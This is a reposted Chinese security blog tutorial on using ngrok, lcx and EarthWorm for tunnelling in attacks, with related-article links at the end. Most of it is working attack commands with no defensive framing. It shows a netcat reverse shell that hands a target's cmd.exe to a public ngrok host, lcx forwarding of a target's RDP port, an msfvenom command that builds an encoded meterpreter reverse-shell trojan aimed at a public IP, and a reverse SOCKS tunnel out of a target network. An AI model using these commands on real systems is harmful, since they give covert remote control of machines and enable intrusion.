常见端口转发工具的使用方式(二)

Ngrok

Ngrok一个反向代理,通过在公共的端点和本地端口建立一个安全的通道,其功能可以反向代理出web服务还有端口转发,这里我们主要演示端口转发的功能

由于ngrok这个工具官网是要翻墙的,所以是能使用国内的Sunny-Ngrok

反弹nc shell

首先我们启动ngrok

./sunny clientid 隧道id

本地监听端口:

nc -vv -lp 9991

目标机器:

nc -vv server.ngrok.cc 33388 -e cmd.exe

这个我们使用nc本地监听ngrok转发的本地端口9001,然后目标机器请求ngrok分配的公网地址把自己的shell交给ngrok公网开放的端口,ngrok把端口再转发到我们本地建立一个隧道获取到shell。效果如下

至此已经拿到了目标机器cmd权限

ngrok结合lcx使用转发3389端口

目标机器:

lcx -slave server.ngrok.cc 33388 127.0.0.1 3389

本地指定监听:

lcx -listen 9991 33389

然后连接我们本地的33389端口:

结合msf反弹meterpreter shell

首先本地开启ngrok

设置用来反弹连接的木马

这里我们都知道配置的时候要获取到ip地址这里我们要用到NetCat这个工具

nc -vv server.ngrok.cc 33388

msfvenom --platform windows -p windows/meterpreter/reverse_tcp LHOST=47.90.92.56 LPORT=33388 -b “\x00”-e x86/shikata_ga_nai -f exe -o ~/桌面/win.exe //生成反弹木马

配置好木马后,我们kali使用msf监听本地ngrok转发的9991端口,等待反弹马

msf exploit(handler) > run

目标机器运行木马

可以看到我们本地已经反弹回了meterpreter的shell

至此,感谢Double8前辈的博文。

EathWorm

EathWorm是一套便携式的网络穿透工具,具有 SOCKS v5服务架设和端口转发两大核心功能,可在复杂网络环境下完成网络穿透,跨平台!!!

该工具共有 6 种命令格式(ssocksd、rcsocks、rssocks、lcx_slave、lcx_listen、lcx_tran)

这里介绍一下反弹socks5端口转发

公网Linux上:

./ew_for_linux64 -s rcsocks -l 1080 -e 8888

目标机器上:

ew_for_Win.exe -s rssocks -d 公网ip -e 8888

显示建立隧道成功

本地使用Proxifier工具进行连接

输入目标机器ip连接3389即可

至此,我们可以清晰的看到已经可以socks代理连接目标端口了。

原文发布于微信公众号 - ChaMd5安全团队(chamd5sec)

原文发表时间:2017-07-13

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

发表于

我来说两句

0 条评论
登录 后参与评论

相关文章

来自专栏ascii0x03的安全笔记

使用mitmproxy嗅探双向认证ssl链接——嗅探AWS IoT SDK的mqtts

亚马逊AWS IoT使用MQTTS(在TLS上的MQTT)来提供物联网设备与云平台直接的通信功能。出于安全考虑,建议给每个设备配备了证书来认证,同时,设备也要安...

44350
来自专栏FreeBuf

花生壳黑吃黑之一:Web练手基地

作为我这样的新手,看网上的渗透社工教程,看的我热血沸腾,但是我怎么找那种脆弱网站练手啊,现在网站一个比一个保护强,什么弱口令,什么注入到哪里去找啊?菜鸟们是否有...

524100
来自专栏SpringBoot 核心技术

OAuth 2和JWT - 如何设计安全的API?

68220
来自专栏落影的专栏

iOS近距离实时通信解决方案

前言 最近研究iOS设备间的近距离实时通信,对其解决方案进行了解,整理如下: ? 其中AirDrop常用于iOS/OS X系统间分享图片、视频等,但实...

39840
来自专栏FreeBuf

OLEOutlook利用:一封邮件绕过所有企业安全防控

在本文中,我会向大家展示如何通过Email将一个可执行文件嵌入到公司网络。伪装成一份Word文档,绕过防火墙,目前该问题还没有任何补丁发布! ? 今天早些时候,...

216100
来自专栏HBStream流媒体与音视频技术

随便写了个猪八戒网的任务小助手“小八戒”,需要的拿去

28240
来自专栏FreeBuf

Adobe Acrobat Reader中存在远程代码注入漏洞

思科 Talos 研究员近期披露了在 Adobe Acrobat Reader DC 中的远程代码执行漏洞。攻击者可以将恶意 JavaScript 代码隐藏在 ...

34980
来自专栏Python爬虫与数据挖掘

手把手教你如何安装水晶易表——靠谱的安装教程

关于水晶易表的介绍在之前的文章就有提及过,感兴趣的小伙伴可以戳这篇文章:关于水晶易表的简介及其安装初识,在此不再进行赘述。今天给大家分享一下水晶易表的安装教程,...

17550
来自专栏魏艾斯博客www.vpsss.net

魏艾斯博客重装 CentOS 系统和添加 Let’s Encrypt 免费 SSL 证书过程全记录

30630
来自专栏FreeBuf

结合中间人攻击,Pidgin鸡肋漏洞变废为宝

最新版本的开源即时通讯客户端Pidgin 2.10.10这段时间修复了一系列漏洞,其中的SSL/TLS证书验证问题可以被黑客利用来进行中间人攻击。如此一来,某些...

22480

扫码关注云+社区

领取腾讯云代金券